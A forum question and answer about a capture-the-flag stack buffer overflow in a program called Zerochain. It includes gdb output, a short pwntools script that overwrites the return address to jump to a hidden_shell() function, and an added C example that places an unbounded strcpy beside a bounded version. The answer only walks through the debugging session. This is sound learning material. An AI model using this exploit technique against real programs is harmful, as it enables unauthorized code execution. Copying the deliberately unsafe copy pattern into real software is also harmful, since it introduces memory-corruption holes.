
Sorry if this is the wrong format. I'm currently doing a CTF and have a problem where I have to overflow a buffer to get access to a hidden /bin/sh function, where I then can get a flag.

I think I successfully overflow the buffer, but when I should be getting access to the hidden function I get the following output.

[ Zerochain ]
1. Add Note
2. Delete Note
3. View Note
4. Vulnerable Log
5. Exit
Your choice: 
Breakpoint 1, 0x0000000000401570 in vulnerable_log ()
(gdb) x/xg $rbp
0x7fffffffdc30: 0x00007fffffffdc50
(gdb) c
Continuing.
Enter log message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x00000000004015b6 in hidden_shell ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e045d4 in do_system (line=0x402113 "/bin/sh") at ../sysdeps/posix/system.c:148
warning: 148    ../sysdeps/posix/system.c: No such file or directory

I'm using gdb to get information from the program.
I have also made the following Python program to insert the different data.

import sys
from pwn import p64  # pwntools helper: packs a 64-bit value little-endian, as x86-64 stores it

# 123 bytes of buffer plus 9 more bytes to reach the saved return address
padding = b"\x41" * (123 + 9)
# address of hidden_shell (0x4015b2); the original wrote these bytes high-byte first,
# which is the wrong byte order for x86-64
return_address = p64(0x4015b2)

sys.stdout.buffer.write(b"4")  # menu option 4: Vulnerable Log
sys.stdout.buffer.write(padding + return_address)

Hope someone can help. If you need more information feel free to ask, since I can link both the file and the CTF problem. Thanks ahead!

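Added example, not code from the question or from the CTF binary: the shape of a stack-buffer overflow like the one in vulnerable_log(), in C, next to a bounded version that refuses an over-long message and a helper that measures how far a message would run past the buffer. The 123-byte buffer size and the unbounded strcpy are assumptions drawn from the question's 123+9 padding arithmetic, and the payload is a constructed stand-in (filler plus 8 placeholder bytes where the script puts the return address).

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Assumption from the question's "123+9" padding: a 123-byte stack buffer. */
#define LOG_SIZE 123

/* Assumed shape of the CTF's vulnerable_log(): an unbounded copy into a fixed
 * stack buffer. Deliberately not called from main(): with a 140-byte message
 * it writes past the buffer over the saved rbp and the return address. */
void vulnerable_log_unsafe(const char *msg) {
    char log[LOG_SIZE];
    strcpy(log, msg);               /* no bound: the overflow in the question */
    printf("logged: %s\n", log);
}

/* Number of bytes of msg (including its NUL) that would land outside a
 * LOG_SIZE buffer; 0 means the message fits. */
size_t bytes_past_buffer(const char *msg) {
    size_t need = strlen(msg) + 1;
    return need > LOG_SIZE ? need - LOG_SIZE : 0;
}

/* Hardened form: bounded copy, guaranteed NUL terminator, and an explicit
 * verdict so the caller can reject an over-long message instead of letting it
 * reach the stack. Returns true only when msg was stored intact. */
bool vulnerable_log_safe(const char *msg, char *log, size_t log_size) {
    size_t n = strlen(msg);
    if (n >= log_size) {            /* would not fit together with its NUL */
        log[0] = '\0';
        return false;
    }
    memcpy(log, msg, n + 1);
    return true;
}

/* Constructed stand-in for the question's payload: 132 filler bytes followed
 * by 8 placeholder bytes where the script places the return address. */
void build_payload(char *out) {
    memset(out, 'A', 132);
    memset(out + 132, 'B', 8);
    out[140] = '\0';
}

int main(void) {
    char payload[141], log[LOG_SIZE];
    build_payload(payload);
    printf("bytes past buffer: %zu\n", bytes_past_buffer(payload));
    printf("payload accepted: %d\n", vulnerable_log_safe(payload, log, sizeof log));
    printf("short message accepted: %d\n", vulnerable_log_safe("hello", log, sizeof log));
    return 0;
}
```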

1 Answer


This is probably a menu-driven program (called Zerochain) offering these options:

1. Add Note
2. Delete Note
3. View Note
4. Vulnerable Log
5. Exit

And here’s what's happening in your gdb session:

You triggered Breakpoint 1 at vulnerable_log():

Breakpoint 1, 0x0000000000401570 in vulnerable_log ()

You checked the base pointer (rbp), and it looks like it points to:

0x7fffffffdc30: 0x00007fffffffdc50

Then you continued (c), and entered a very long input for "Enter log message":

AAAAAAAAAA.... (lots of A's)

After that, you hit Breakpoint 2, this time inside hidden_shell():

Breakpoint 2, 0x00000000004015b6 in hidden_shell ()

That suggests your input redirected control flow to this hidden function!

Then you continued again, and the program ran do_system() with the command /bin/sh:

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e045d4 in do_system (line=0x402113 "/bin/sh")

So the program was trying to execute a shell before crashing.
